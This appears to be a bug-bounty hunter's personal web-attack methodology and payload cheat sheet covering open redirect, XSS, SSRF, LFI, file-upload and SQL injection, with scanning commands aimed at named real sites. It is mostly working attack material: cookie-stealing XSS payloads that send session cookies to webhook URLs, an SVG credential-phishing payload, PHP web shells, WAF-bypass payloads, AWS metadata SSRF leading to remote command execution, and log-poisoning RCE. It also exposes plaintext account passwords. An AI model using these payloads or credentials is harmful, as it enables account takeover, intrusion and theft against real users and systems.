💎My methodology

• Find Wild card Scope like: *.target.com

• Set domain scope(burpsuite).*.target.com$

• Run subdomain.sh Script

curl -X GET "https://login.rbleipzig.com/en/sso/login?apiKey=4_htVHQTXwdHjOTKV1hr61rg" | grep -i -E 'location.href|location.search|window.location|window.hash|window.location.href|location.search|location.pathname|document.URL|getparam|getUelParameter|getParameter()|parameter|innerHTML|outerHTML|document.write|document.writeln|var ='

• Find AllRegister and signup Foams for Open Redirect to Stealing User Session token

Open redirects in the login flow mostly have the session token or any other auth token in the query param.

inurl:register | intitle:register | inurl:signup | intitle:signup | intext:signin site:.who.int

• Find thePersistent XSS in the Signup Process

in the name field: <img src=x onerror​=alert(origin)> in the name field.

Credentials

hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123

• Find theOpen Redirect in these components:

• Sign in & register pages

• Sign out endpoint

• Email verification links

• Profile account page

• Password resets (inspect the generated token link too as it may contain a redirect parameter)

server-side redirects always use Location response header with 3XX status code If missing Location response header but still redirects (after a small delay), it DOM-based redirect

Run open-dork.sh Script

Check Server and client side redirect then Exploit Further

check Location Header

curl -I "https://www.target.com/redirect?url=https://www.example.com"
curl "https://account.cbg.nl/logout?redirect_uri=https://evil.com/" | grep -i -E 'location.href|window.location|window.location.href' 

• iflocation.href window.location window.location.href in DOMthen Check Open Redirect to XSS

javascript:alert(origin)
javascript:confirm(1);//

• Open Redirect DOM XSS toAccount Take Over

javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookie

Find XSS Steps

• 1:FistFind tech based Subdomains withhttpx or Shodan or Google Dork like: PHP

• Check Subdomains.sh to tech based Filters Domains

• Check Ext-dork to tech based Filters Domains

• Check Shodan-dork to tech based Filters Domains

• 2:ThenFind how many Subdomain used endpoint-extentionswith Google Dork or Wayback machine or roborts.txt or Fuzzing like PHP tech used endpoint-extensions: php,htm,html

• Sort out AllSubdomain to used endpoint-extentionsand check one by one

• Run ext-dork.sh Script with Specific Domain

• 
  dirsearch -w raft-medium-directories.txt -u https://xyz.example.com -e js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,pl --full-url --max-rate=5 -i 200

• feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,pl -w raft-small-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 5

• ffuf -u https://www.kfc.co.uk/FUZZ -w common.txt -recursion -recursion-depth 4 -mc 200 -e .js,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.action,.pl -rate 50 -t 50

Check Hidden Paths inroborts.txt

httpx-toolkit -l livesubdomains.txt -paths /robots.txt -silent -o robots-url.txt && for url in $(cat robots-url.txt);do http -b $url | grep 'Disallow' | awk -F ' ' '{print $2}' | cut -c 2- | anew robot-words.txt;done

ffuf -u FUZZ/robots.txt -w livesubdomains.txt -mr "/INTERSHOP/"

• 3:ThenFind origin IPusing shodan,fofa For Endpoint BF and WafBypass

• Run hostname:"mytoken.us.dell.com" Shodan

• Run host:"mytoken.us.dell.com" Fofa

• nslookup mytoken.us.dell.com

• 4:ThenFind vulnerable Endpointsof Both Domain and origin IP according to tech and endpoint-extention: with Fuzzing used ffuf or Dirsearsh like error.php, demo.html, test.htm

• Run Fuzzing with FFUF

• Run Fuzzing with Gobuster

• Run Fuzzing with Dirsearch

• 5:Then find the vulnerable Parameterswith Arjun or x8like error.php?code=xss

• Run Arjun

• Run Parampp

• Run x8 with parameters wordlist

• 6:Then confirm html injection

arjun -i endpoint.txt -oT Arjun.txt && cat Arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss-check.txt && cat xss-check.txt | Gxss | httpx -sc && cat xss-check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-html-injection.txt

• 7:Then confirm Reflected XSS

cat xss-check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txt

• 8:Find XSS Vulnerable Endpoint in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

• 9:Reflected XSS toAccount Take Over

• https://xss.report/dashboard swagpk Synack@3434

• https://bxsshunter.com/dashboard Synack@3434

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

• 10:Then confirmSQL injection

while read url; do
    echo "Testing URL: $url"
    yes n | ghauri -u "$url" --dbs --banner --current-db --level 3
done < arjun.txt

ghauri -u https://www.webucate.in/page-category_freeTestSeries.php?catId=42&subCatId=63 --random-agent -v3 --level=3 risk=3

• 11:Then confirmOpen Redirect

cat xss-check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -location

cat xss-check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location

• 12:Then confirm Local file inclusion (LFI)

echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"

echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done

---------------------------------------------------------------------

1

Open Redirect GET-Based in Register-Login-logout-signup and Reset-Password Page URL

echo 'https://be.elementor.com/visit/?bta=13693&brand=elementor&landingPage=' | httpx -paths op.txt -threads 50 -random-agent -sc -location

URL Decode and Encode - OnlineURL Decode

Request Catcher — record HTTP requests, webhooks, API callsrequestcatcher.com

create a subdomain on test Application

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Open Redirect Cheat SheetPentester Land

Bypass via encoding

https://evil.com
https://%09/evil.com
http%3A%2F%2Fwww.google.com
https%3A%2F%2Fwww.google.com%2F
https://www%2Egoogle%2Ecom
https://www%252Egoogle%252Ecom
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
%68%74%74%70%3a%2f%2fevil.com
/%0D/evil%25%32%65com
%40evil.com/
%2F%2Fevil.com
%2F%2F%2F%2Fhackerone.com

Bypass filter

//evil.com
///evil.com/
////evil.com
/%0d/evil.com
/%09/evil.com
/%0A/evil.com
/%0D/evil.com
/%09/evil.com
/+/evil.com
/\evil.com/
\\evil.com\
/..//evil.com
http:///evil.com/
@www.bing.com
.evil.com
https:evil.com
https;evil.com
https:\/\/evil.com
https:/\/\evil.com
https:\\evil.com

Bypass whitelist

target.com%40evil.com
https://target.com%5C%5C@google.com/
https://evil.com%5C%40www.example.com
https://target.com@evil.com/
https://target.com/@evil.com
https://evil.com\@target.com
https://target.com.bing.com/
https://target.com?bing.com
https://target.com°bing.com
https://target.com%23bing.com
https://target.com%00bing.com
https://target.com%0Abing.com
https://target.com%0Dbing.com
https://target.com%0Dbing.com
https://target.com%09bing.com
/%0d/evil.com/
https://evil.com\\.target.com/
https://evil.com%E3%80%82%23.target.com/
https://target.com%00https://evil.com/
https://website.com/http://evil.com/
http://evil.com?vimeocdn.com/
https://attacker.com%E3%80%82example.com   
?link=https://bing.com?link=https://www.target.com/
?link=https://evil.com/?link=https://open.spreaker.com//https://evil.com
?Redirect=https:/www.target.com/login-redirect/?redirect=//any-domain.com

OAuth to Open-Redirect

https://auth.<company>/?next_url=https://www.<product>/login-redirect/?redirect=//any-domain.com?token=<TOKEN>
https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8

2

DOM XSS Check In Redirect Parameters

My Payloads

javascript:confirm(1);//
java%0d%0ascript%0d%0a:alert(document.domain)
javascript://%250Dtop.confirm?.(origin)//
javascript:%250Aalert(1)//
javascript:@evil.com
java%0D%0Ascript%0D%0A:alert(document.domain)
javascript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"

# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)

3

If Access token available In Redirect URL then Check Account take Over

j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookie

OR Check with Burp Collaborater And Webhook URL

Webhook.site - Test, transform and automate Web requests and emailswebhook.site

4

SSRF Check In Redirect OR Data Fetch and File Download Parameters

wfuzz -z range,0-65535 -u 'https://www.somaiya.edu.in/download.php?pdf_path=127.0.0.1:FUZZ'

python3 ssrfmap.py -r request.txt -p "url" -m readfiles,portscan

http://169.254.169.254/latest/meta-data/
http://169.254.169.254//latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/
file:///etc/passwd
file:///etc/shadow
file:///etc/shells
file:///etc/group
file:///etc/profile
file:///etc/hosts
file:///proc/self/environ
file:///proc/self/status
file:///proc/mounts
file:///proc/version
file:///bin/sh
file:///C:/Windows/win.ini
file:///web.config
file:///C:/windows/System32/drivers/etc/hosts
cat /e*c/p*s*d

5

if SSRF then check to Reflected XSS

Example: https://mop4.com/?url=https://brutelogic.com.br/poc.svg

Payload URL

https://brutelogic.com.br/poc.svg

6

if SSRF then check to RCE

1) Configure AWS CLI

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=us-west-1
export AWS_SESSION_TOKEN=

2) these Paths can be used to find the region
/latest/meta-data/placement/availability-zone
/latest/dynamic/instance-identity/document

3) aws sts get-caller-identity

4) aws s3 ls

5) aws ssm send-command --document-name "AWS-RunShellScript" --comment "AnyComment" --instance-ids="[Instance-id]" --parameters "commands=uname -a"

7

Blind XSS Check to Account take Over

XSS.ReportXSS.Report

swagpk Synack@3434

https://bxsshunter.com/dashboardbxsshunter.com

Synack@34343

8

Find File upload Vulnerabilities like: RCE-SXSS-SSRF-LFI

site:.who.int "choose file"
site:.who.int intext:"choose file" | inurl:"uploadform" 
site:.who.int inurl:"uploadform" 
site:.who.int inurl:"uploadform" filetype:asp 

• Check SVG File to Tacking it to Credentials Theft

• Check SVG File to Stored XSS

• Check Docx File to HTML

• Check Docx File to SSRF

• Check XSS in Reflected File Name

• Check PHP Function to LFI

• Check PHP Reverse Shell to RCE

• Observe that which PHP RCE functions:popen(),system(), shell_exec(), passthuru() and file read functions like incluce(),require(),file_get_contents() were disabled and enabled this php Application

• Craft Reverse Shell payload with that PHP function and save it into the file name shell.php if client-side validation to bypass it Shell.php.jpg

• intercept the file upload request in burpsuite and removed the .jpg extension and forwarded the file upload request to the server.

PHP Pyload with that popen() PHP function:
---------
<?php$cmd = $_GET['cmd'];echo `$cmd`;?>
/uploadform/uploads/shell.php?code=echo%20%60id%60

PHP Pyload with that popen() PHP function:
---------
<?php system($_GET['$cmd']) ;?>  
/uploadform/uploads/shell.php?cmd='id'

jpg to xss

exiftool -Comment="\"><script>alert(prompt('XSS BY Asad'))</script>" xss.jpg

Svg to SXSS

# File Name Bypass: "Fileupload.svg.png”
# Change Content-Type: image/svg+xml

# Svg File Payload Uploaded Here :

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">

<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009901" stroke=”#004400"/>

<script type=”text/javascript”>
alert(document.cookie);
</script>
</svg>

Svg to Credentials Theft

# Tacking it to Credentials Theft by Modifying the Above Payload to:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

        <script> 
                var passwd = prompt("Enter your password to continue");
                var xhr = new XMLHttpRequest();
                xhr.open("GET","https://attacker-url.com/log.php?password="+encodeURI(passwd));
                xhr.send();
        </script>

</svg>

docx to htmi and ssrf

<h1>injected</h1>
<img src="file:///etc/hosts"/>

PHP to LFI

<?php
    $file = $_GET['file'];
    include($file);
?>

9

Burp Suite And Browser Setting for find XSS

Turn On Burp and Add to Scope
Turn on Burp Extensions to find Reflected XSS: 
Reflection + Reflector + isXSS +  HopLa + Hackbar + Reflection-Tracer
Turn on Crome Extention : Xnl Reveal
Turn on Crome Extention: Param Scan
Turn on Crome Extention: extractify
Turn on Crome Extention: input Hidden Moniter
Turn on Crome Extention: link Gopher and linkg rabber
Hunting for XSS: Set up filters in Burp Suite with Content-Type: text/html

10

Find Disallow Path for Fuzzing

site:dell.com inurl:robots.txt

11

Find Origin IP with Favicon hash for find Endpoints

cat livesubdomains.txt | httpx -favicon -j | jq -r .favicon | grep -v null | sort -u
http.favicon.hash:hash_number_here

12

Find Hidden Endpoints FOR Fuzzing

FUFF

recursion -recursion-depth 4
-rate 50 -t 50
-p 0.5-0.6 
-v -mc 200
-v -fc 401,403
-e .html,.htm
-e .php,.html,.htm
-e .asp,.aspx,.html,.htm
-e .jsp,.jspx,.do,.html,.htm,.action
-x "http://127.0.0.1:8080"
-s

Dirsearsh

--exclude-sizes 0B 
--recursive
--random-agent
--max-rate=
--full-url
--cookie=
-i 200
-x 401,403
-e html,htm
-e php,html,htm,js
-e asp,aspx,html,htm,js
-e jsp,jspx,do,html,htm,action,js
-e js,php,html,xhtml,htm,asp,aspx,ashx,asmx,cfm,jsp,jspx,do,action,pl

13

Find Hidden Parameters

python3 parampp.py -u https://press.zara.com/ECOMPressSite/error.html

cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '"><a href=https://bing.com>hacked' | tee -a confirm-xss.txt

cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '"><a href=https://bing.com>hacked' | tee -a confirm-xss.txt

Arjun

-c 500
-d 2
-t 10 -T 10
--stable 
--passive
-m POST
-oT arjun.txt
--disable-redirects 
--headers ‘Cookie: PHPSESSID=xxxx’

x8

--reflected-only 
-X GET
-u 
-w
-v

14

Find XSS vulnerable Endpoint to check in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

15

Confirm Vulnerable Parameter for Html injection OR Reflected XSS

"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
'"><img src=x onerror=confirm(origin)>
"><svg onload=confirm(1)>
(confirm)(origin)
javascript:confirm(document.domain)
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe

XSS Payloads

### if Website Remove payloads Kaywords then used this Payloads:
<a/href=j&#97v&#97script&#x3A;&#97lert(origin)>ClickMe
"><a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>

16

Akamai WAF Bypasses...

';k='e'%0Atop['al'+k+'rt'](1)//
'><A HRef=' AutoFocus OnFocus=top//?.['ale'%2B'rt'](1)>
---------------------
CloudFlare WAF Bypasses...
'"><A HRef=\" AutoFocus OnFocus​=top/**/?.['ev'%2B'al'](`imp\u00%36%66rt\u00%32%38'//X55.is'\u00%32%39`)>

<svg/onload=window['al'+'ert']1337>
<Svg Only=1 OnLoad=confirm(document.cookie)>
<svg onload=alert&#0000000040document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1//On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Img Src=OnXSS OnError=prompt(1337)>
<Img Src=OnXSS OnError=prompt(document.cookie)>
<Svg Only=1 OnLoad=confirm(atob('Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=='))>
---------------------
Cloudfront WAF Bypasses...

%2522%253E%253Csvg/onload​=alert(origin)%253E
'>'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
'>%0D%0A%0D%0A<x '='foo'><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>'>
---------------------
ModSecurity WAF Bypasses...

Payloads designed to evade ModSecurity WAF rules
<svg onload='new Function['Y000!'].find(al\u0065rt)'>
---------------------
Imperva WAF Bypasses...

Advanced techniques for bypassing Imperva WAF protection
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter='location=javas+cript:ale+rt%2+81%2+9;//</div'>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle='propmt(document.cookie);'>
---------------------
Sucuri WAF Bypasses...

<A HREF='https://www.cia.gov/'>Click Here </A>
'><img src=x onerror=alert(document.cookie)>
<button onClick='prompt(1337)'>Submit</button>
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(1337)>ClickMe
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
<a href='j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://github.com/coffinxp';'>ClickMe</a>

17

Find Origin IP for Bypass WAF

hostname:".dell.com" http.component:php
hostname:".dell.com" http.component:java
hostname:".dell.com" http.component:ASP.NET

nslookup mytoken.us.dell.com

https://search.censys.io/
host="mytoken.us.dell.com"

https://en.fofa.info/
host="mytoken.us.dell.com"

https://www.shodan.io/search
hostname:"mytoken.us.dell.com"

curl -i url | head -n 15

18

Create and Customize XSS Payload According WAF and Regex

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

JSFiddle - Code Playgroundjsfiddle.net

19

RXSS to Account Take Over

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

XSS.ReportXSS.Report

swagpk Synack@3434

https://bxsshunter.com/dashboardbxsshunter.com

Synack@34343

20

Dork for finding Swagger DOM XSS

Google Dork

site:domain.com intext:"Swagger UI" | intitle:"Swagger UI"
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?url= 
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl= 

Shodan Dork

http.title:"Swagger UI" hostname:"domain.com"

?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

21

if GET Parameter Check for LFI and Path traversal

# "Running LFI Testing on gf lfi Parameters with httpx..."
echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"

# "Running LFI Testing on gf lfi Parameters with Fuff..."
echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done

22

LFI to RCE

User-Agent: <?php phpinfo(); ?>
User-Agent: <?php system('id'); ?>
User-Agent: <?php system('ls -lsa'); ?>
User-Agent: <?php echo system('env') ?>
User-Agent: <?php system($_GET['$cmd']) ?>  listner:URL/path/file=/etc/passwd&cmd='id'

logs files:
/var/www/logs/access.log
/var/log/apache/access.log
/etc/httpd/logs/acces_log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log

23

if GET Parameter Check for SQL injection

SQLMap Command Generatortaurusomar.github.io

SQLMap Command Generatoracorzo1983.github.io